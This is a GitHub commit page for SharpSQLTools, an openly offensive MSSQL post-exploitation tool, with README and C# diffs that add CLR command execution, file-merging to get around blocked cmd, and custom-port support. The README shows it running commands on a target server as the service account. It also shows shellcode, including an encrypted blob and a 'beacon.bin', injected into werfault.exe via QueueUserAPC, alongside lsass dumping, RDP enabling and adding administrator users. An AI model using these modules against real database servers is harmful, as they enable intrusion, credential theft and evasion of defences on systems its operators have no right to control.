Skip to content

Commit

Permalink
添加部分功能并更新readme
Browse files Browse the repository at this point in the history 
1.添加clr执行命令和程序
2.添加clr合并文件功能,方便在cmd被拦截时代替copy /b合并文件
3.修改支持自定义端口
4.更新readme
  • Loading branch information
@uknowsec
uknowsec committed Jun 22, 2021
1 parent 7abfb58 commit 735c8a4
Show file tree
Hide file tree
Showing 3 changed files with 145 additions and 37 deletions.
83 changes: 76 additions & 7 deletions README.md
View file
Original file line number Diff line number Diff line change
Expand Up @@ -23,8 +23,8 @@
Usage:
SharpSQLTools target username password database - interactive console
SharpSQLTools target username password database module command - non-interactive console
SharpSQLTools target:port username password database - interactive console
SharpSQLTools target:port username password database module command - non-interactive console
Module:
Expand All @@ -40,7 +40,9 @@ enable_clr - you know what it means
disable_clr - you know what it means
install_clr - create assembly and procedure
uninstall_clr - drop clr
clr_dumplsass - dumplsass by clr
clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files
clr_dumplsass {path} - dumplsass by clr
clr_rdp - check RDP port and Enable RDP
clr_getav - get anti-virus software on this machin by clr
clr_adduser {user} {pass} - add user by clr
Expand All @@ -57,8 +59,8 @@ exit - terminates the server process (and this session)
支持交互模式与非交互模式,交互模式直接跟目标,用户名和密码即可。非交互模式直接跟模块与命令。

```
SharpSQLTools target username password database - interactive console
SharpSQLTools target username password database module command - non-interactive console
SharpSQLTools target:port username password database - interactive console
SharpSQLTools target:port username password database module command - non-interactive console
```


Expand All @@ -84,6 +86,35 @@ nt authority\system
nt service\mssqlserver
```

#### clr执行命令

```
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec whoami
[*] Database connection is successful!
[+] Process: cmd.exe
[+] arguments: /c whoami
[+] RunCommand: cmd.exe /c whoami
nt service\mssql$sqlexpress
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\windows/system32\whoami.exe
[*] Database connection is successful!
[+] Process: c:\windows/system32\whoami.exe
[+] arguments:
[+] RunCommand: c:\windows/system32\whoami.exe
nt service\mssql$sqlexpress
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_exec -p c:\cmd.exe -a /c whoami
[*] Database connection is successful!
[+] Process: c:\cmd.exe
[+] arguments: /c whoami
[+] RunCommand: c:\cmd.exe /c whoami
nt service\mssql$sqlexpress
```

#### clr_scloader
```
λ python Encrypt.py -f nc.bin -k 1234
Expand All @@ -94,7 +125,7 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
[*] Database connection is successful!
[+] EncryptShellcode: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMeE3Xw+z51MPPR2WNzYny6YBO/cw57NeG5s7wxMjN8tPJHU3kz42S6eitwunITfTDi0GJ5zfp1uga7fDDkfgX4egL0nXPy/TxzMvUJ0kbFfTF/EDl3CuVE6mtwunIXfTDiVXW6PntwunIvfTDicr81uns14XNrdWlsam5wanJtcGh7t90ScmbO0mt1aGh7vyPbZMvOzW59j0VABm4BATQxc2V9uNR7td2SMjQxe7rReI4xNDgv85wxV3JgeLvXeLjDco59RRUzzud/vdtaMjUxMmp1ixuzXzHN5mRhfwL9fAPzfM7ye73zesz0ebvydYvYPOvRzeZ8uPVZJHBqf73TerrNcIiqkUVTzOF5s/d0MzIzfYlRXlAxMjM0MXNjdWF6utZmZWR5APJZOWhzY9bNVPRwFWYyNXm/dxAp9DNcebvVYmFzY3Vhc2N9zvJyZHjN+3m483+98HOJTf0NtcvkegLmec35vz9ziTy2L1PL5InDgZNkco6Xp46pzud7t/UaDzJNOLPP0Uc2j3YhQVtbMmp1uOjM4Q==
[+] XorKey: 1234
[+] StartProcess notepad.exe
[+] StartProcess werfault.exe
[+] OpenProcess Pid: 2508
[+] VirtualAllocEx Success
[+] QueueUserAPC Inject shellcode to PID: 2508 Success
Expand All @@ -104,6 +135,36 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
[*] QueueUserAPC Inject shellcode Success, enjoy!
```

#### clr_scloader1
```
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader1 C:\Users\Public\payload.txt aaaa
[*] Database connection is successful!
[+] EncryptShellcodePath: C:\Users\Public\payload.txt
[+] XorKey: aaaa
[+] StartProcess werfault.exe
[+] OpenProcess Pid: 3232
[+] VirtualAllocEx Success
[+] QueueUserAPC Inject shellcode to PID: 3232 Success
[+] hOpenProcessClose Success
[*] QueueUserAPC Inject shellcode Success, enjoy!
```

#### clr_scloader2
```
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_scloader2 C:\Users\Public\beacon.bin
[*] Database connection is successful!
[+] ShellcodePath: C:\Users\Public\beacon.bin
[+] StartProcess werfault.exe
[+] OpenProcess Pid: 332
[+] VirtualAllocEx Success
[+] QueueUserAPC Inject shellcode to PID: 332 Success
[+] hOpenProcessClose Success
[*] QueueUserAPC Inject shellcode Success, enjoy!
```

#### clr_dumplsass

Expand Down Expand Up @@ -153,7 +214,15 @@ Result: zXqw0MHa8zQxMnJlcGJhZWd6AuZUerhmUXq4Zil6uGYRerhGYXo8g3t4fgX4egL0nQ5SSDMe
[*] Adding Group Member success
```


#### clr_combine
```
λ SharpSQLTools.exe 192.168.247.139 sa 1qaz@WSX master clr_combine C:\Users\Public\payload.txt
[*] Database connection is successful!
[+] remoteFile: C:\Users\Public\payload.txt
[+] count: 5
[+] combinefile: C:\Users\Public\payload.txt_*.config_txt C:\Users\Public\payload.txt
[*] 'C:\Users\Public\payload.txt_*.config_txt' CombineFile completed
```

#### clr_download

Expand Down
95 changes: 67 additions & 28 deletions SharpSQLTools/Program.cs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -30,6 +30,8 @@ private static void Help()
disable_clr - you know what it means
install_clr - create assembly and procedure
uninstall_clr - drop clr
clr_exec {cmd} - for example: clr_exec whoami;clr_exec -p c:\a.exe;clr_exec -p c:\cmd.exe -a /c whoami
clr_combine {remotefile} - When the upload module cannot call CMD to perform copy to merge files
clr_dumplsass {path} - dumplsass by clr
clr_rdp - check RDP port and Enable RDP
clr_getav - get anti-virus software on this machin by clr
Expand Down Expand Up @@ -255,37 +257,54 @@ static void DownloadFiles(String localFile, String remoteFile)
Console.WriteLine("[*] '{0}' Download completed", remoteFile);
}

public static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args)
public static string result = string.Empty;
private static void OnInfoMessage(object mySender, SqlInfoMessageEventArgs args)
{
String value = String.Empty;
var value = string.Empty;
foreach (SqlError err in args.Errors)
{
value = err.Message;
Console.WriteLine(value);
value += err.Message;
}
result = value;
Console.WriteLine(result);
}

static void interactive(string[] args)
/// <summary>
/// 数据库连接
/// </summary>
public static SqlConnection SqlConnet(string target, string dbName, string uName, string passwd, ref string result)
{
string target = args[0];
string username = args[1];
string password = args[2];
string database = args[3];

SqlConnection Conn = null;
var connectionString = $"Server = \"{target}\";Database = \"{dbName}\";User ID = \"{uName}\";Password = \"{passwd}\";";
try
{
//sql建立连接
string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target,database, username, password);
Conn = new SqlConnection(connectionString);
Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
Conn.Open();
Console.WriteLine("[*] Database connection is successful!");
result = $"[*] Database connection is successful! {DateTime.Now.ToString()}";
Console.WriteLine(result);
}
catch (Exception ex)
{
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
result = $"[!] Error log: {ex.Message}";
Console.WriteLine(result);
Environment.Exit(0);
}
return Conn;
}

static void interactive(string[] args)
{
string target = args[0];
if (target.Contains(":"))
{
target = target.Replace(":", ",");
}
string username = args[1];
string password = args[2];
string database = args[3];
string result = "";
Conn = SqlConnet(target,database,username,password, ref result);

setting = new Setting(Conn);

Expand Down Expand Up @@ -356,6 +375,13 @@ static void interactive(string[] args)
clr_exec(s);
break;
}
case "clr_exec":
{
String s = String.Empty;
for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; }
clr_exec(s);
break;
}
case "clr_scloader":
{
String s = String.Empty;
Expand Down Expand Up @@ -384,6 +410,13 @@ static void interactive(string[] args)
clr_exec(s);
break;
}
case "clr_combine":
{
String s = String.Empty;
for (int i = 0; i < cmdline.Length; i++) { s += cmdline[i] + " "; }
clr_exec(s);
break;
}
case "enable_clr":
setting.Enable_clr();
break;
Expand Down Expand Up @@ -429,24 +462,16 @@ static void Noninteractive(string[] args)
return;
}
string target = args[0];
if (target.Contains(":"))
{
target = target.Replace(":", ",");
}
string username = args[1];
string password = args[2];
string database = args[3];
string module = args[4];
try
{
//sql建立连接
string connectionString = String.Format("Server = \"{0}\";Database = \"{1}\";User ID = \"{2}\";Password = \"{3}\";", target, database, username, password);
Conn = new SqlConnection(connectionString);
Conn.InfoMessage += new SqlInfoMessageEventHandler(OnInfoMessage);
Conn.Open();
Console.WriteLine("[*] Database connection is successful!");
}
catch (Exception ex)
{
Console.WriteLine("[!] Error log: \r\n" + ex.Message);
Environment.Exit(0);
}
string result = "";
Conn = SqlConnet(target, database, username, password, ref result);

setting = new Setting(Conn);
try
Expand Down Expand Up @@ -525,6 +550,13 @@ static void Noninteractive(string[] args)
clr_exec(s);
break;
}
case "clr_exec":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++) { s += args[i] + " "; }
clr_exec(s);
break;
}
case "clr_scloader":
{
String s = String.Empty;
Expand Down Expand Up @@ -553,6 +585,13 @@ static void Noninteractive(string[] args)
clr_exec(s);
break;
}
case "clr_combine":
{
String s = String.Empty;
for (int i = 4; i < args.Length; i++) { s += args[i] + " "; }
clr_exec(s);
break;
}
case "enable_clr":
setting.Enable_clr();
break;
Expand Down
4 changes: 2 additions & 2 deletions SharpSQLTools/Setting.cs
View file

Large diffs are not rendered by default.

0 comments on commit 735c8a4

Please sign in to comment.